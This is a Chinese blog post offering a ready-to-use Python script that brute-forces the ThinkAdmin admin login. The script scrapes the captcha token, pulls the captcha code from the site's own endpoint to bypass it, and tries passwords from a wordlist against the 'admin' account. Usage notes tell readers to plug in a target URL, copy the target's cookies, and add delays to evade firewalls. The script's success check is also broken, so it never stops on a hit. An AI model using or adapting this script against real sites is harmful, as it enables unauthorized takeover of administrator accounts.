ThinkAdmin 后台样式
爆破脚本代码
import requests import hashlib import json import fileinput from bs4 import BeautifulSoup urls = "http://127.0.0.1:81" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Cookie': 'sd9611012=udlbvtklamk6oil9mdfhqsr9au; thinkphp_show_page_trace=0|0; s3e5be473=vf1ljf9bg6rs9ngsc7lnhtlrc2' } def create_md5(pwd): md5_obj = hashlib.md5() md5_obj.update((pwd).encode("utf-8")) return md5_obj.hexdigest() #获取data-captcha-token def token(): try: url = "%s/admin/login.html"%(urls) html = requests.get(url,headers=headers) soup = BeautifulSoup(html.text, "html.parser") token = soup.find('label', {'data-captcha-type': 'login_captcha'}).get('data-captcha-token') return token except: print('token请求失败') #根据data-captcha-token 获取code和uniqid def value(): try: url = "%s/admin/login/captcha"%(urls) d = {'type': 'login_captcha', 'token': token()} html = requests.post(url, data=d,headers=headers) html = json.loads(html.text) uniqid = html['data']['uniqid'] code = html['data']['code'] return uniqid,code except: print('value请求失败') #登陆请求 def login(pwd): try: url = "%s/admin/login.html"%(urls) uniqid,code = value() pwds = create_md5(pwd)+uniqid md5 = create_md5(pwds) d = { 'username': 'admin', 'password': md5, 'verify':code, 'uniqid':uniqid } html = requests.post(url, data=d,headers=headers) html = json.loads(html.text) print("%s 密码:%s"%(html['info'],pwd)) except: print('login请求失败') with fileinput.input(files=(r'F:\back\pass\top1w.txt'),openhook=fileinput.hook_encoded("utf-8")) as f: try: count=0 for line in f: count = count+1 print("第 %s 次尝试"%(count)) if login(line.replace("\n", "")) == '登录成功': break except: print('爆破结束')
使用须知
- 密码字典放在脚本同目录下,命名:password.txt
- 不同的站点,cookie 结构不同,请自行修改第十行 cookie 内容。(访问目标网站,然后复制浏览器中的全部 cookie 即可,这一步很重要,是根据 cookie 绕过验证码的)
- 第 7 行填写目标 url 地址
- 使用报错请自行安装 python 依赖库
- 登陆用户名修改 43 行,默认 admin
成功截图
考虑到可能出现被防火墙拦截的情况,所以没有添加线程增加爆破速度。
如果出现防火墙拦截,自行加一个延迟即可
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !